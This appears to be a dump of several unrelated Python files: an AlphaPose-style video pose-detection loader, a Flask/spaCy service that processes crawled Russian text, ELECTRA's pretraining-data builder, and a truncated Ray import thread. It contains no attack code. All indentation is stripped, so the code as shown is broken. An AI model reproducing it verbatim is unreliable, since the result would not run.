dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:,0]==k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
self.datalen = self.detectionLoader.datalen
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = pQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
if orig_img is None:
self.Q.put((None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class VideoDetectionLoader:
def __init__(self, path, batchSize=4, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if self.datalen % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
def length(self):
return self.datalen
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole video
for i in range(self.num_batches):
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], boxes[dets[:,0]==k], scores[dets[:,0]==k]))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class WebcamLoader:
def __init__(self, webcam, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
# read the next frame from the file
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img, orig_img, dim = prep_frame(frame, inp_dim)
inp = im_to_torch(orig_img)
im_dim_list = torch.FloatTensor([dim]).repeat(1, 2)
self.Q.put((img, orig_img, inp, im_dim_list))
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self, save_video=False,
savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640,480),
queueSize=1024, format='yolo'):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
self.format = format
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
if opt.matching:
preds = getMultiPeakPrediction(
hm_data, pt1.numpy(), pt2.numpy(), opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = matching(boxes, scores.numpy(), preds)
else:
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = pose_nms(
boxes, scores, preds_img, preds_scores)
result = {
'imgname': im_name,
'result': result
}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result, format_=self.format)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self, train=True, sigma=1,
scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian', format='yolo'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = opt.nClasses
self.nJoints_mpii = 16
self.nJoints = opt.nClasses
if format == 'yolo':
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17)
self.flipRef = ((2, 3), (4, 5), (6, 7),
(8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
elif format == 'mtcnn':
self.accIdxs = tuple(range(1, opt.nClasses + 1))
self.flipRef = ((1, 33), (2, 32), (3, 31), (4, 30), (5, 29), (6, 28), (7, 27), (8, 26), (9, 25), (10, 24), (11, 23), (12, 22), (13, 21), (14, 20), (15, 19), (16, 18),
(34, 47), (35, 46), (36, 45), (37, 44), (38, 43), (39, 51), (40, 50), (41, 49), (42, 48),
(52, 65), (53, 64), (54, 63), (55, 62), (56, 67), (57, 66), (58, 68), (59, 69), (60, 70), (61, 71),
(76, 77), (78, 79), (80, 81), (82, 86), (83, 85),
(87, 91), (97, 98), (93, 94), (96, 95), (88, 90), (99, 101), (102, 104), (105, 106))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
Crop detected humans from the original image according to the detection results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor(
(float(box[0]), float(box[1])))
bottomRight = torch.Tensor(
(float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
try:
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
except IndexError:
print(tmp_img.shape)
print(upLeft)
print(bottomRight)
print('===')
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
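# Note: each detection box is expanded by scaleRate (30%) on every side, clamped
# to the image bounds, and cropped/resized to (inputResH, inputResW) via cropBox.
# pt1/pt2 record the padded crop corners, presumably so downstream pose
# post-processing (e.g. getPrediction above) can map heatmap coordinates back to
# original-image coordinates.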
|
yagami.py
|
#!/usr/bin/env python3
print("[YAGAMI] importing libraries")
import sys
import os
import json
import requests
from typing import List
from cleantext import clean
import spacy
import threading
import queue
from flask import Flask, request  # stdlib json is already imported above
print("[YAGAMI] defining constants")
# URL to submit processed strings
URL_BASE = "http://127.0.0.1:32000"
URL_CLEAN = URL_BASE + "/text"
URL_STATUS = URL_BASE + "/status"
YAGAMI_HOST = "localhost"
YAGAMI_PORT = 32393
# Session for requests
s = requests.session()
s.verify = False
# This is for worker to work through
workerQueue = queue.Queue()
print("[YAGAMI] loading dictionaries")
# ---------- RUSSIAN SPACY -------------
# Check here: https://spacy.io/models/ru
# --------------------------------------
# nlp_ru = spacy.load("ru_core_news_sm") # lightweight
nlp_ru = spacy.load("ru_core_news_lg") # heavylifter
app = Flask(__name__)
@app.route("/", methods=["GET"])
def hello():
name = request.args.get("name", "World")
return f"[YAGAMI] Hello, {name}!"
@app.route("/process", methods=["POST"])
def process():
if not request.is_json:
return "Expected a json with a text key"
data = request.get_json(force=True)
if data is None:
return "JSON parsing failed"
print(f"[YAGAMI] Put a new worker job: {data['title']}")
workerQueue.put(data)
return "success"
CHUNK_SIZE = 100_000
def fragmentize(text: str) -> List[str]:
to_return = []
for i in range(0, len(text), CHUNK_SIZE):
to_return.append(text[i : i + CHUNK_SIZE])
return to_return
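# For illustration: fragmentize splits on fixed character offsets, so a 250_000
# character text yields three fragments of lengths 100_000, 100_000 and 50_000;
# any text shorter than CHUNK_SIZE comes back as a single one-element list.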
def worker():
while True:
data = workerQueue.get()
fragments = fragmentize(data["text"])
print(f"[YAGAMI] {data['url']} got fragmented into {len(fragments)} pieces")
for i, fragment in enumerate(fragments):
print(f"[YAGAMI] Sending {data['title']} with count = {i}")
p_analyze(
data["ip"],
data["url"],
int(data["status"]),
data["start"],
i,
data["crawler"],
data["title"],
fragment,
)
print(f"[YAGAMI] Worker completed {data['title']}")
def p_analyze(
ip: str,
url: str,
status: int,
start: str,
count: int,
crawler: str,
title: str,
text: str,
):
clean_text = clean_text_f(text)
doc = nlp_ru(clean_text)
# word_tokens = nltk.word_tokenize(clean_text, language="russian")
# num_words = len(word_tokens)
# sent_tokens = nltk.sent_tokenize(clean_text, language="russian")
# num_sentences = len(sent_tokens)
num_sentences = sum(1 for _ in doc.sents)
num_words = sum(1 for token in doc if token.is_alpha)
shapes = " ".join(token.shape_ for token in doc)
tags = " ".join(token.tag_ for token in doc)
lemmas = " ".join(token.lemma_ for token in doc)
to_send_text = " ".join(token.text for token in doc)
to_return = {
"original": clean_text,
"text": to_send_text,
"shapes": shapes,
"tags": tags,
"lemmas": lemmas,
"title": title,
"ip": ip,
"url": f"{url}#{count}",
"status": status,
"start": f"{start}",
"name": crawler,
"num_words": num_words,
"num_sentences": num_sentences,
}
final_json = json.dumps(to_return, ensure_ascii=False, sort_keys=True)
# self.file.write(final_json)
try:
s.post(
URL_CLEAN,
data=final_json.encode("utf-8"),
headers=getSpiderHeaders("LOCAL"),
)
except Exception as e:
print("Failed to send a text payload:", e)
def getSpiderHeaders(spiderName):
return {
"User-Agent": spiderName,
"Accept": "*/*",
"Connection": "keep-alive",
"Content-Type": "application/json",
"Authorization": "cool_local_key",
}
def clean_text_f(dirty_text: str) -> str:
"""
Cleans the text of stray newlines, tabs, extra whitespace, and
unwanted glyphs.
"""
# Use the text cleaner to remove scary stuff
return clean(
dirty_text,
fix_unicode=True,
to_ascii=False,
lower=False,
no_line_breaks=True,
no_urls=True,
no_emails=True,
no_phone_numbers=True,
no_numbers=False,
no_digits=False,
no_currency_symbols=False,
no_punct=False,
no_emoji=False,
replace_with_punct="",
replace_with_url="<URL>",
replace_with_email="<EMAIL>",
replace_with_phone_number="<PHONE>",
replace_with_number="<NUMBER>",
replace_with_digit="0",
replace_with_currency_symbol="<CUR>",
lang="en",
)
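# With the settings above, clean() keeps the original case and non-ASCII
# characters, collapses line breaks into single spaces, and replaces URLs,
# e-mail addresses and phone numbers with the <URL>, <EMAIL> and <PHONE>
# placeholders; numbers, digits, punctuation, currency symbols and emoji pass
# through unchanged.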
if __name__ == "__main__":
wrk = threading.Thread(target=worker, args=(), name="Scapy worker")
wrk.start()
print("[YAGAMI] Started the spacy worker")
app.run(host=YAGAMI_HOST, port=YAGAMI_PORT, debug=False)
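# Rough usage sketch (values are placeholders): a crawler posts a job as JSON to
# the /process endpoint, e.g.
#   requests.post("http://localhost:32393/process", json={
#       "ip": "203.0.113.7", "url": "http://example.com/page", "status": 200,
#       "start": "2021-01-01T00:00:00", "crawler": "spider-1",
#       "title": "Example", "text": "..."})
# The worker thread then fragments the text and sends each cleaned/tagged
# fragment to URL_CLEAN via p_analyze.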
|
build_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes out text data as tfrecords that ELECTRA can be pre-trained on."""
import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
feature = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return feature
class ExampleBuilder(object):
"""Given a stream of input text, creates pretraining examples."""
def __init__(self, tokenizer, max_length):
self._tokenizer = tokenizer
self._current_sentences = []
self._current_length = 0
self._max_length = max_length
self._target_length = max_length
def add_line(self, line):
"""Adds a line of text to the current example being built."""
line = line.strip().replace("\n", " ")
if (not line) and self._current_length != 0: # empty lines separate docs
return self._create_example()
bert_tokens = self._tokenizer.tokenize(line)
bert_tokids = self._tokenizer.convert_tokens_to_ids(bert_tokens)
self._current_sentences.append(bert_tokids)
self._current_length += len(bert_tokids)
if self._current_length >= self._target_length:
return self._create_example()
return None
def _create_example(self):
"""Creates a pre-training example from the current list of sentences."""
# small chance to only have one segment as in classification tasks
if random.random() < 0.1:
first_segment_target_length = 100000
else:
# -3 due to not yet having [CLS]/[SEP] tokens in the input text
first_segment_target_length = (self._target_length - 3) // 2
first_segment = []
second_segment = []
for sentence in self._current_sentences:
# the sentence goes to the first segment if (1) the first segment is
# empty, (2) the sentence doesn't put the first segment over length or
# (3) 50% of the time when it does put the first segment over length
if (len(first_segment) == 0 or
len(first_segment) + len(sentence) < first_segment_target_length or
(len(second_segment) == 0 and
len(first_segment) < first_segment_target_length and
random.random() < 0.5)):
first_segment += sentence
else:
second_segment += sentence
# trim to max_length while accounting for not-yet-added [CLS]/[SEP] tokens
first_segment = first_segment[:self._max_length - 2]
second_segment = second_segment[:max(0, self._max_length -
len(first_segment) - 3)]
# prepare to start building the next example
self._current_sentences = []
self._current_length = 0
# small chance for random-length instead of max_length-length example
if random.random() < 0.05:
self._target_length = random.randint(5, self._max_length)
else:
self._target_length = self._max_length
return self._make_tf_example(first_segment, second_segment)
def _make_tf_example(self, first_segment, second_segment):
"""Converts two "segments" of text into a tf.train.Example."""
vocab = self._tokenizer.vocab
input_ids = [vocab["[CLS]"]] + first_segment + [vocab["[SEP]"]]
segment_ids = [0] * len(input_ids)
if second_segment:
input_ids += second_segment + [vocab["[SEP]"]]
segment_ids += [1] * (len(second_segment) + 1)
input_mask = [1] * len(input_ids)
input_ids += [0] * (self._max_length - len(input_ids))
input_mask += [0] * (self._max_length - len(input_mask))
segment_ids += [0] * (self._max_length - len(segment_ids))
tf_example = tf.train.Example(features=tf.train.Features(feature={
"input_ids": create_int_feature(input_ids),
"input_mask": create_int_feature(input_mask),
"segment_ids": create_int_feature(segment_ids)
}))
return tf_example
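# Worked example (hypothetical token ids, max_length=8): with
# first_segment=[5, 6] and second_segment=[7], the features become
#   input_ids   = [CLS] 5 6 [SEP] 7 [SEP] 0 0
#   input_mask  =   1   1 1   1   1   1   0 0
#   segment_ids =   0   0 0   0   1   1   0 0
# i.e. padding positions are masked out and the second segment gets type id 1.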
class ExampleWriter(object):
"""Writes pre-training examples to disk."""
def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
num_jobs, blanks_separate_docs, do_lower_case,
num_out_files=1000, strip_accents=True):
self._blanks_separate_docs = blanks_separate_docs
tokenizer = tokenization.FullTokenizer(
vocab_file=vocab_file,
do_lower_case=do_lower_case,
strip_accents=strip_accents)
self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
self._writers = []
for i in range(num_out_files):
if i % num_jobs == job_id:
output_fname = os.path.join(
output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
i, num_out_files))
self._writers.append(tf.io.TFRecordWriter(output_fname))
self.n_written = 0
def write_examples(self, input_file):
"""Writes out examples from the provided input file."""
with tf.io.gfile.GFile(input_file) as f:
for line in f:
line = line.strip()
if line or self._blanks_separate_docs:
example = self._example_builder.add_line(line)
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
example = self._example_builder.add_line("")
if example:
self._writers[self.n_written % len(self._writers)].write(
example.SerializeToString())
self.n_written += 1
def finish(self):
for writer in self._writers:
writer.close()
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = ExampleWriter(
job_id=job_id,
vocab_file=args.vocab_file,
output_dir=args.output_dir,
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=args.blanks_separate_docs,
do_lower_case=args.do_lower_case,
strip_accents=args.strip_accents,
num_out_files=args.num_out_files,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
fnames = [f for (i, f) in enumerate(fnames)
if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0:
elapsed = time.time() - start_time
log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no, len(fnames), 100.0 * file_no / len(fnames), int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written))
example_writer.write_examples(os.path.join(args.corpus_dir, fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--corpus-dir", required=True,
help="Location of pre-training text files.")
parser.add_argument("--vocab-file", required=True,
help="Location of vocabulary file.")
parser.add_argument("--output-dir", required=True,
help="Where to write out the tfrecords.")
parser.add_argument("--max-seq-length", default=128, type=int,
help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int,
help="Parallelize across multiple processes.")
parser.add_argument("--blanks-separate-docs", default=True, type=bool,
help="Whether blank lines indicate document boundaries.")
parser.add_argument("--num_out_files", default=1000, type=int,
help="Number of output files.")
# toggle lower-case
parser.add_argument("--do-lower-case", dest='do_lower_case',
action='store_true', help="Lower case input text.")
parser.add_argument("--no-lower-case", dest='do_lower_case',
action='store_false', help="Don't lower case input text.")
# toggle strip-accents
parser.add_argument("--do-strip-accents", dest='strip_accents',
action='store_true', help="Strip accents (default).")
parser.add_argument("--no-strip-accents", dest='strip_accents',
action='store_false', help="Don't strip accents.")
# set defaults for toggles
parser.set_defaults(do_lower_case=True)
parser.set_defaults(strip_accents=True)
args = parser.parse_args()
utils.rmkdir(args.output_dir)
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
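# Rough invocation sketch (paths are placeholders):
#   python build_pretraining_dataset.py --corpus-dir data/corpus \
#       --vocab-file data/vocab.txt --output-dir data/pretrain_tfrecords \
#       --max-seq-length 128 --num-processes 4 --no-lower-case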
|
import_thread.py
|
from collections import defaultdict
import threading
import traceback
import redis
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
from ray import profiling
from ray import utils
import logging
logger = logging.getLogger(__name__)
class ImportThread:
"""A thread used to import exports from the driver or other workers.
Note: The driver also has an import thread, which is used only to import
custom class definitions from calls to _register_custom_serializer that
happen under the hood on workers.
Attributes:
worker: the worker object in this process.
mode: worker mode
redis_client: the redis client used to query exports.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
imported_collision_identifiers: This is a dictionary mapping collision
identifiers for the exported remote functions and actor classes to
the number of times that collision identifier has appeared. This is
used to provide good error messages when the same function or class
is exported many times.
"""
def __init__(self, worker, mode, threads_stopped):
self.worker = worker
self.mode = mode
self.redis_client = worker.redis_client
self.threads_stopped = threads_stopped
self.imported_collision_identifiers = defaultdict(int)
def start(self):
"""Start the import thread."""
self.t = threading.Thread(target=self._run, name="ray_import_thread")
# Making the thread a daemon causes it to exit
# when the main thread exits.
self.t.daemon = True
self.t.start()
def join_import_thread(self):
"""Wait for the thread to exit."""
self.t.join()
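# Rough usage sketch (names besides ImportThread are placeholders): the owning
# worker creates the thread, starts it, and later signals shutdown through the
# shared event, e.g.
#   stop_event = threading.Event()
#   import_thread = ImportThread(worker, worker.mode, stop_event)
#   import_thread.start()
#   ...
#   stop_event.set()
#   import_thread.join_import_thread()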
def _run(self):
import_pubsub_client = self.redis_client.pubsub()
# Exports that are published after the call to
# import_pubsub_client.subscribe and before the call to
# import_pubsub_client.listen will still be processed in the loop.
import_pubsub_client.subscribe("__keyspace@0__:Exports")
# Keep track of the number of imports that we've imported.
num_imported = 0
try:
# Get the exports that occurred before the call to subscribe.
export_keys = self.redis_client.lrange("Exports", 0, -1)
for key in export_keys:
num_imported += 1
self._process_key(key)
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = import_pubsub_client.get_message()
if msg is None:
self.threads_stopped.wait(timeout=0.01)
continue
if msg["type"] == "subscribe":
continue
assert msg["data"] == b"rpush"
num_imports = self.redis_client.llen("Exports")
assert num_imports >= num_imported
for i in range(num_imported, num_imports):
num_imported += 1
key = self.redis_client.lindex("Exports", i)
self._process_key(key)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error("ImportThread: {}".format(e))
finally:
# Close the pubsub client to avoid leaking file descriptors.
import_pubsub_client.close()
def _get_import_info_for_collision_detection(self, key):
"""Retrieve the collision identifier, type, and name of the import."""
if key.startswith(b"RemoteFunction"):
collision_identifier, function_name = (self.redis_client.hmget(
key, ["collision_identifier", "function_name"]))
return (collision_identifier, ray.utils.decode(function_name),
"remote function")
elif key.startswith(b"ActorClass"):
collision_identifier, class_name = self.redis_client.hmget(
key, ["collision_identifier", "class_name"])
return collision_identifier, ray.utils.decode(class_name), "actor"
def _process_key(self, key):
"""Process the given export key from redis."""
# Handle the driver case first.
if self.mode != ray.WORKER_MODE:
if key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
# If the same remote function or actor definition appears to be
# exported many times, then print a warning. We only issue this
# warning from the driver so that it is only triggered once instead
# of many times. TODO(rkn): We may want to push this to the driver
# through Redis so that it can be displayed in the dashboard more
# easily.
elif (key.startswith(b"RemoteFunction")
or key.startswith(b"ActorClass")):
collision_identifier, name, import_type = (
self._get_import_info_for_collision_detection(key))
self.imported_collision_identifiers[collision_identifier] += 1
if (self.imported_collision_identifiers[collision_identifier]
== ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
logger.warning(
"The %s '%s' has been exported %s times. It's "
"possible that this warning is accidental, but this "
"may indicate that the same remote function is being "
"defined repeatedly from within many tasks and "
"exported to all of the workers. This can be a "
"performance issue and can be resolved by defining "
"the remote function on the driver instead. See "
"https://github.com/ray-project/ray/issues/6240 for "
"more discussion.", import_type, name,
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
# Return because FunctionsToRun are the only things that
# the driver should import.
return
if key.startswith(b"RemoteFunction"):
with profiling.profile("register_remote_function"):
(self.worker.function_actor_manager.
fetch_and_register_remote_function(key))
elif key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker
# into an actor of that class.
self.worker.function_actor_manager.imported_actor_classes.add(key)
# TODO(rkn): We may need to bring back the case of
# fetching actor classes here.
else:
raise Exception("This code should be unreachable.")
def fetch_and_execute_function_to_run(self, key):
"""Run on arbitrary function on the worker."""
(job_id, serialized_function,
run_on_other_drivers) = self.redis_client.hmget(
key, ["job_id", "function", "run_on_other_drivers"])
if (utils.decode(run_on_other_drivers) == "False"
and self.worker.mode == ray.SCRIPT_MODE
and job_id != self.worker.current_job_id.binary()):
return
try:
# FunctionActorManager may call pickle.loads at the same time.
# Importing the same module in different threads causes deadlock.
with self.worker.function_actor_manager.lock:
